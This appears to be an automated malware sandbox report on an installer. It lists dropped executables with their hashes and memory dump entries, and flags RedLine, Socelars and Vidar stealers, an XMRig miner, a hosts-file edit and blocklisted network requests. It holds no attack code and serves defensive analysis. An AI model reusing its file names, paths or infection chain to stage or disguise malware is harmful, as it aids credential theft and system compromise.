memory/2368-218-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe

MD5 93460c75de91c3601b4a47d2b99d8f94
SHA1 f2e959a3291ef579ae254953e62d098fe4557572
SHA256 0fdba84fe8ed2cf97023c544d3f0807dbb12840c8e7d445a3a4f55174d78b5b2
SHA512 4370ae1a1fc10c91593839c51d0fbae5c0838692f95e03cac315882b026e70817b238f7fe7d9897049856469b038acc8ccfd73aae1af5775bfef35bde2bf7856

memory/2368-221-0x0000000000720000-0x0000000000721000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe

MD5 93460c75de91c3601b4a47d2b99d8f94
SHA1 f2e959a3291ef579ae254953e62d098fe4557572
SHA256 0fdba84fe8ed2cf97023c544d3f0807dbb12840c8e7d445a3a4f55174d78b5b2
SHA512 4370ae1a1fc10c91593839c51d0fbae5c0838692f95e03cac315882b026e70817b238f7fe7d9897049856469b038acc8ccfd73aae1af5775bfef35bde2bf7856

memory/2008-208-0x0000000006CC0000-0x0000000006CC1000-memory.dmp

memory/2008-206-0x0000000006B20000-0x0000000006B21000-memory.dmp

memory/2740-223-0x0000000000000000-mapping.dmp

C:\ProgramData\8016308.exe

MD5 d3502a1369d09902d246e5a172bda5e6
SHA1 aab2040bc51ecb0dd2678f44c68cfbd722704a28
SHA256 912719650b5facfcb89b623b32a58780426cb4c9d36761c50a80c73bf783e94c
SHA512 5fa99e666d2006afffef54ec87ba347c28881d64c47c995788e291e1cd9048231ab620a30ed89ca3e04ebaf19737685ed4165473521f99f44b318499a9aa66d4

C:\ProgramData\8016308.exe

MD5 d3502a1369d09902d246e5a172bda5e6
SHA1 aab2040bc51ecb0dd2678f44c68cfbd722704a28
SHA256 912719650b5facfcb89b623b32a58780426cb4c9d36761c50a80c73bf783e94c
SHA512 5fa99e666d2006afffef54ec87ba347c28881d64c47c995788e291e1cd9048231ab620a30ed89ca3e04ebaf19737685ed4165473521f99f44b318499a9aa66d4

memory/2940-225-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe

MD5 926fbc9261cf783ea941891e0644c0c5
SHA1 d90c0f8a499dcf2a7d5a92c316f2b736d999f7d3
SHA256 bfc101337c0065cd9f844ce03b3db348940a28acd6cbb5e0c0adf230c2850805
SHA512 91b4de74719f538dbe92eec6dcae0f4453adc2626adaee0d1ce705f97ed2fe9d47e6f25f7e692c0383a11a9c6812ca1bcd59274eb71b1de9584a3aefb10da49f

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe

MD5 926fbc9261cf783ea941891e0644c0c5
SHA1 d90c0f8a499dcf2a7d5a92c316f2b736d999f7d3
SHA256 bfc101337c0065cd9f844ce03b3db348940a28acd6cbb5e0c0adf230c2850805
SHA512 91b4de74719f538dbe92eec6dcae0f4453adc2626adaee0d1ce705f97ed2fe9d47e6f25f7e692c0383a11a9c6812ca1bcd59274eb71b1de9584a3aefb10da49f

memory/5028-229-0x0000000000000000-mapping.dmp

memory/5016-230-0x0000000000000000-mapping.dmp

memory/2940-234-0x0000000000470000-0x0000000000471000-memory.dmp

memory/5028-239-0x00000000008F0000-0x00000000008F1000-memory.dmp

memory/5016-238-0x0000000000C00000-0x0000000000C01000-memory.dmp

memory/4856-242-0x0000000000400000-0x0000000001788000-memory.dmp

memory/4788-245-0x0000000000400000-0x00000000017F2000-memory.dmp

memory/5016-247-0x000000001B8C0000-0x000000001B8C2000-memory.dmp

memory/2740-250-0x0000000001010000-0x000000000102E000-memory.dmp

memory/5028-251-0x0000000002AD0000-0x0000000002AD4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 234fad127f21b6119124e83d9612dc75
SHA1 01de838b449239a5ea356c692f1f36cd0e3a27fd
SHA256 32668075f8c859636cb19de60d5ddc6e4fa1bfbc94eb6504636946d641110876
SHA512 41618ad70dc6296200471ce85be320502425730b84cb3b92f9295725746c024593811c61addc4c15c1a3d51227e50e159bc09c8d75b6029476c5b8afaacba002

memory/3896-252-0x000000001BF70000-0x000000001BF71000-memory.dmp

memory/5028-255-0x0000000007B80000-0x0000000007B81000-memory.dmp

memory/2940-257-0x00000000009A0000-0x00000000009BB000-memory.dmp

memory/2740-258-0x000000001BC60000-0x000000001BC61000-memory.dmp

memory/2940-260-0x00000000009C0000-0x00000000009C1000-memory.dmp

memory/4400-263-0x0000000000000000-mapping.dmp

C:\ProgramData\330255.exe

MD5 b1ef16d34497d921e4cd574fff8965e4
SHA1 3b959651330acccd31e5646575c889a3861bdcda
SHA256 3776ad134256d78e535c3fc72e576d91f58f80f26c7e69f0d5cd8f6648a40ef8
SHA512 d033ca7c732cb63cc0557760589372f53aeada5d1eb735aab2072823f2cadd2bdb3ae412682e4f1ab40dd4b805424b9580d9ff46d51a6f123de1e32b84ef11f6

memory/2740-267-0x000000001B940000-0x000000001B942000-memory.dmp

memory/4396-271-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4400-274-0x0000000000970000-0x0000000000971000-memory.dmp

memory/4008-277-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe

MD5 068565654f0bbe81d602e7afa851201d
SHA1 108c21228fedab58d897af46c7bd0e57438ccf3e
SHA256 d55d5c14f6759edcded7cd9ec5d6cc430abc90ebe07224b599a26449d241b73d
SHA512 4bac7eb52e8f40511f462bacce5cb80f8b43d8f76c7331b0908b36a4c372bd483f050d1fff34cff3c5a360fb49ad32869225d0d0eb1097df80d05181646ca68a

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe

MD5 068565654f0bbe81d602e7afa851201d
SHA1 108c21228fedab58d897af46c7bd0e57438ccf3e
SHA256 d55d5c14f6759edcded7cd9ec5d6cc430abc90ebe07224b599a26449d241b73d
SHA512 4bac7eb52e8f40511f462bacce5cb80f8b43d8f76c7331b0908b36a4c372bd483f050d1fff34cff3c5a360fb49ad32869225d0d0eb1097df80d05181646ca68a

C:\Users\Admin\AppData\Local\Temp\udptest.exe

MD5 f1cd08ca29a2add76e5b0464750c645b
SHA1 929de2a20f5d82b333f95213c955e90e2e0fc66c
SHA256 0cb33bdee818c06cd3e34b8b3a2a0f4120bd91527ef87406f4086bd2841ef5ec
SHA512 4ae6b8729b1ff8061839c0ba8f5a13ce50e5746fab4ed4fadd2e2aab1a9ad31198ca31d8748d64f7011a361e253b29ca2b4112ad201c670fb38f95b5068c6687

memory/1264-279-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3002.exe

MD5 e511bb4cf31a2307b6f3445a869bcf31
SHA1 76f5c6e8df733ac13d205d426831ed7672a05349
SHA256 56002017746f61eee8d8e9b5ad2f3cbb119dc99300c5b6d32c1be184d3e25137
SHA512 9c81de34bf3b0eb75405c726d641ef6090054e9be8e0c0ab1bb2ed095e6477ce2fa8996868bf8a77a720b210a76b5f4e1b3b086d7f40449d79498681b367199c

memory/2008-275-0x0000000007DD0000-0x0000000007DD1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

MD5 f9be28007149d38c6ccb7a7ab1fcf7e5
SHA1 eba6ac68efa579c97da96494cde7ce063579d168
SHA256 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914
SHA512 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

MD5 f9be28007149d38c6ccb7a7ab1fcf7e5
SHA1 eba6ac68efa579c97da96494cde7ce063579d168
SHA256 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914
SHA512 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171

memory/4400-293-0x0000000005BF0000-0x0000000005BF1000-memory.dmp

memory/1076-292-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\is-EB0NR.tmp\setup_2.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/1828-284-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\is-EB0NR.tmp\setup_2.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/2940-272-0x0000000002550000-0x0000000002552000-memory.dmp

memory/3920-273-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

MD5 3f85c284c00d521faf86158691fd40c5
SHA1 ee06d5057423f330141ecca668c5c6f9ccf526af
SHA256 28915433217ce96922b912651ae21974beba3a35aab6c228d5e96e296c8925dc
SHA512 0458856a88a11d259595c9c9ec105131c155fffb9c039b492e961b6aaf89ecec4e2d057fd6a2305f55303e777e08346a437dc22741ed288fb84d6d37b814d492

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

MD5 3f85c284c00d521faf86158691fd40c5
SHA1 ee06d5057423f330141ecca668c5c6f9ccf526af
SHA256 28915433217ce96922b912651ae21974beba3a35aab6c228d5e96e296c8925dc
SHA512 0458856a88a11d259595c9c9ec105131c155fffb9c039b492e961b6aaf89ecec4e2d057fd6a2305f55303e777e08346a437dc22741ed288fb84d6d37b814d492

C:\ProgramData\330255.exe

MD5 b1ef16d34497d921e4cd574fff8965e4
SHA1 3b959651330acccd31e5646575c889a3861bdcda
SHA256 3776ad134256d78e535c3fc72e576d91f58f80f26c7e69f0d5cd8f6648a40ef8
SHA512 d033ca7c732cb63cc0557760589372f53aeada5d1eb735aab2072823f2cadd2bdb3ae412682e4f1ab40dd4b805424b9580d9ff46d51a6f123de1e32b84ef11f6

memory/4396-264-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\udptest.exe

MD5 f1cd08ca29a2add76e5b0464750c645b
SHA1 929de2a20f5d82b333f95213c955e90e2e0fc66c
SHA256 0cb33bdee818c06cd3e34b8b3a2a0f4120bd91527ef87406f4086bd2841ef5ec
SHA512 4ae6b8729b1ff8061839c0ba8f5a13ce50e5746fab4ed4fadd2e2aab1a9ad31198ca31d8748d64f7011a361e253b29ca2b4112ad201c670fb38f95b5068c6687

memory/4312-259-0x0000000000000000-mapping.dmp

memory/5028-256-0x0000000007680000-0x0000000007681000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 234fad127f21b6119124e83d9612dc75
SHA1 01de838b449239a5ea356c692f1f36cd0e3a27fd
SHA256 32668075f8c859636cb19de60d5ddc6e4fa1bfbc94eb6504636946d641110876
SHA512 41618ad70dc6296200471ce85be320502425730b84cb3b92f9295725746c024593811c61addc4c15c1a3d51227e50e159bc09c8d75b6029476c5b8afaacba002

memory/2940-249-0x0000000000990000-0x0000000000991000-memory.dmp

memory/4316-248-0x0000000000000000-mapping.dmp

memory/2008-246-0x0000000007C40000-0x0000000007C41000-memory.dmp

memory/2008-241-0x00000000068A0000-0x00000000068A1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2.exe

MD5 3bef291868337302198597f1e49e11cb
SHA1 705a5efb3feddf5758c0ff3ff27f8dc2c78ccd64
SHA256 7b8d7b971e0505f5ebfd9c726e8435878c6077ce2b235f2f647f7b5c21c2980b
SHA512 85d96a08642d0ef59312c275c33dfdf5db3eb4b3fbfd48ec88d590cf28a2debe86b415d830fa8c3f87386ac788448887aef1b1911728e82a5b778d3f458730df

memory/4400-298-0x0000000005650000-0x0000000005668000-memory.dmp

memory/4900-300-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1264-301-0x00000000001E0000-0x00000000001E1000-memory.dmp

memory/5040-305-0x0000000000000000-mapping.dmp

memory/1076-306-0x0000000004B40000-0x0000000004B41000-memory.dmp

memory/4400-308-0x00000000056D0000-0x00000000056D3000-memory.dmp

memory/4688-316-0x0000000000000000-mapping.dmp

memory/4460-314-0x0000000000000000-mapping.dmp

memory/564-313-0x0000000000000000-mapping.dmp

memory/4008-312-0x0000000007CE0000-0x0000000007CE1000-memory.dmp

memory/4008-311-0x0000000002D80000-0x0000000002D81000-memory.dmp

memory/5040-310-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2800-307-0x0000000000AE0000-0x0000000000AF5000-memory.dmp

memory/4900-302-0x000000000041C5E2-mapping.dmp

memory/4400-303-0x00000000051F0000-0x00000000056EE000-memory.dmp

memory/4528-320-0x0000000000000000-mapping.dmp

memory/4316-321-0x00000000001D0000-0x00000000001FF000-memory.dmp

memory/564-322-0x00000000001F0000-0x00000000001F1000-memory.dmp

memory/4460-325-0x0000000003200000-0x000000000325F000-memory.dmp

memory/4460-323-0x0000000004C1A000-0x0000000004D1B000-memory.dmp

memory/1956-318-0x0000000000000000-mapping.dmp

memory/1076-295-0x00000000002F0000-0x00000000002F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2.exe

MD5 3bef291868337302198597f1e49e11cb
SHA1 705a5efb3feddf5758c0ff3ff27f8dc2c78ccd64
SHA256 7b8d7b971e0505f5ebfd9c726e8435878c6077ce2b235f2f647f7b5c21c2980b
SHA512 85d96a08642d0ef59312c275c33dfdf5db3eb4b3fbfd48ec88d590cf28a2debe86b415d830fa8c3f87386ac788448887aef1b1911728e82a5b778d3f458730df

C:\ProgramData\4638748.exe

MD5 068565654f0bbe81d602e7afa851201d
SHA1 108c21228fedab58d897af46c7bd0e57438ccf3e
SHA256 d55d5c14f6759edcded7cd9ec5d6cc430abc90ebe07224b599a26449d241b73d
SHA512 4bac7eb52e8f40511f462bacce5cb80f8b43d8f76c7331b0908b36a4c372bd483f050d1fff34cff3c5a360fb49ad32869225d0d0eb1097df80d05181646ca68a

memory/2740-232-0x0000000000B00000-0x0000000000B01000-memory.dmp

C:\ProgramData\4638748.exe

MD5 068565654f0bbe81d602e7afa851201d
SHA1 108c21228fedab58d897af46c7bd0e57438ccf3e
SHA256 d55d5c14f6759edcded7cd9ec5d6cc430abc90ebe07224b599a26449d241b73d
SHA512 4bac7eb52e8f40511f462bacce5cb80f8b43d8f76c7331b0908b36a4c372bd483f050d1fff34cff3c5a360fb49ad32869225d0d0eb1097df80d05181646ca68a

memory/848-334-0x0000000000000000-mapping.dmp

memory/2556-338-0x000001B461160000-0x000001B4611AD000-memory.dmp

memory/5172-340-0x0000000000000000-mapping.dmp

memory/4316-346-0x0000000000400000-0x0000000002B5D000-memory.dmp

memory/436-343-0x000001899C600000-0x000001899C674000-memory.dmp

memory/2556-341-0x000001B461470000-0x000001B4614E4000-memory.dmp

memory/2736-349-0x0000016155BD0000-0x0000016155C44000-memory.dmp

memory/4900-351-0x0000000005630000-0x0000000005C36000-memory.dmp

memory/2736-337-0x00007FF684874060-mapping.dmp

memory/2344-352-0x00000246AEC50000-0x00000246AECC4000-memory.dmp

memory/4528-355-0x0000000004B20000-0x0000000004B21000-memory.dmp

memory/5504-358-0x0000000000000000-mapping.dmp

memory/5456-356-0x0000000000000000-mapping.dmp

memory/2280-366-0x000001D16A640000-0x000001D16A6B4000-memory.dmp

memory/1188-368-0x00000208B25B0000-0x00000208B2624000-memory.dmp

memory/5692-371-0x0000000000000000-mapping.dmp

memory/5668-370-0x0000000000000000-mapping.dmp

memory/1068-381-0x000001EC65140000-0x000001EC651B4000-memory.dmp

memory/1460-386-0x0000022E58100000-0x0000022E58174000-memory.dmp

memory/5456-389-0x000000001B060000-0x000000001B062000-memory.dmp

memory/6000-392-0x0000000000000000-mapping.dmp

memory/5504-390-0x0000000004BB0000-0x0000000004BB1000-memory.dmp

memory/1920-393-0x0000027DBF2B0000-0x0000027DBF324000-memory.dmp

memory/6052-397-0x0000000000000000-mapping.dmp

memory/4312-396-0x0000000002BD0000-0x0000000002C00000-memory.dmp

memory/1308-401-0x000001A0138A0000-0x000001A013914000-memory.dmp

memory/5692-416-0x00000000056C0000-0x0000000005BBE000-memory.dmp

memory/4312-420-0x00000000074B0000-0x00000000074B1000-memory.dmp

memory/5304-424-0x0000000000000000-mapping.dmp

memory/1412-427-0x0000024B66860000-0x0000024B668D4000-memory.dmp

memory/2664-429-0x00000261BB870000-0x00000261BB8E4000-memory.dmp

memory/2008-431-0x000000007E980000-0x000000007E981000-memory.dmp

memory/4312-434-0x00000000074B2000-0x00000000074B3000-memory.dmp

memory/6052-441-0x0000000005210000-0x0000000005211000-memory.dmp

memory/2652-447-0x000001B3BC500000-0x000001B3BC574000-memory.dmp

memory/4312-444-0x0000000000400000-0x0000000002B6D000-memory.dmp

memory/4312-438-0x00000000074B3000-0x00000000074B4000-memory.dmp

memory/456-417-0x000000000041C5EE-mapping.dmp

memory/4312-454-0x00000000074B4000-0x00000000074B6000-memory.dmp

memory/4568-458-0x0000000000000000-mapping.dmp

memory/456-461-0x0000000005190000-0x0000000005796000-memory.dmp

memory/5024-463-0x0000000000000000-mapping.dmp

memory/2008-464-0x00000000066F3000-0x00000000066F4000-memory.dmp

memory/4744-465-0x0000000000000000-mapping.dmp

memory/5264-468-0x0000000000000000-mapping.dmp

memory/5412-471-0x0000000000000000-mapping.dmp

memory/5172-483-0x0000000000400000-0x0000000001BB5000-memory.dmp

memory/5172-481-0x0000000003CB0000-0x00000000045CE000-memory.dmp

memory/5872-480-0x0000000000000000-mapping.dmp

memory/5768-486-0x0000000000000000-mapping.dmp

memory/5768-499-0x0000000000400000-0x0000000000416000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2021-09-11 20:41

Reported

2021-09-11 21:12

Platform

win11

Max time kernel

1801s

Max time network

1780s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

RedLine

infostealer redline

RedLine Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Socelars

stealer socelars

Socelars Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateProcessExOtherParentProcess

Description Indicator Process Target
PID 5072 created 1412 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19e4750dd01.exe
PID 5288 created 3224 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19c6762a08beae.exe
PID 5320 created 1272 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19e6a852f849bb2.exe
PID 5852 created 5688 N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 6016 created 4376 N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\6069887.exe
PID 4784 created 4112 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe
PID 6128 created 4220 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 3332 created 5212 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\hlti0apf.ahj\anyname.exe
PID 5652 created 6016 N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe
PID 572 created 5428 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\udptest.exe
PID 4372 created 476 N/A C:\Users\Admin\AppData\Local\Temp\70-37310-b33-bae8d-a4fad9cb4a45f\Bafumiluto.exe C:\Windows\SysWOW64\rundll32.exe
PID 504 created 3388 N/A C:\Windows\system32\WerFault.exe C:\ProgramData\4390821.exe
PID 1792 created 5360 N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\3313646.exe
PID 5452 created 5136 N/A C:\Windows\system32\WerFault.exe C:\ProgramData\6546358.exe
PID 6016 created 5728 N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\8148614.exe
PID 2076 created 5348 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\atkyez3y.fgc\GcleanerEU.exe
PID 2400 created 4520 N/A C:\Windows\explorer.exe C:\Users\Admin\AppData\Local\Temp\btxe21if.5c3\gcleaner.exe
PID 5660 created 3500 N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Vidar

stealer vidar

rl_trojan

stealer
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Checks for common network interception software

evasion

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

XMRig Miner Payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\is-8TFS5.tmp\46807GHF____.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat196ac06a9e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat191649b47c9e2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19e4750dd01.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19c6762a08beae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19f84b58b3d7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat1946eb84e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat19ba05e89ea6d406.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\Sat199ba8a4637dcb034.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0R9HU.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-8TFS5.tmp\46807GHF____.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\ProgramData\4390821.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe N/A
N/A N/A C:\ProgramData\6069887.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hlti0apf.ahj\anyname.exe N/A
N/A N/A C:\ProgramData\149669.exe N/A
N/A N/A C:\ProgramData\3313646.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udptest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\ProgramData\6069887.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-M578V.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jhuuee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-L7BH5.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe N/A
N/A N/A C:\ProgramData\6546358.exe N/A
N/A N/A C:\ProgramData\4877252.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3002.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE N/A
N/A N/A C:\ProgramData\1510349.exe N/A
N/A N/A C:\ProgramData\7798956.exe N/A
N/A N/A C:\ProgramData\8148614.exe N/A
N/A N/A C:\Program Files\Windows Photo Viewer\QKHSYTRWTS\ultramediaburner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\97-85cbe-1b1-73991-1a0a48cb830cc\Jashedulaju.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-CFA31.tmp\ultramediaburner.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\70-37310-b33-bae8d-a4fad9cb4a45f\Bafumiluto.exe N/A
N/A N/A C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\atkyez3y.fgc\GcleanerEU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pd522mdf.fsy\installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hlti0apf.ahj\anyname.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\btxe21if.5c3\gcleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS883CDC93\setup_install.exe N/A
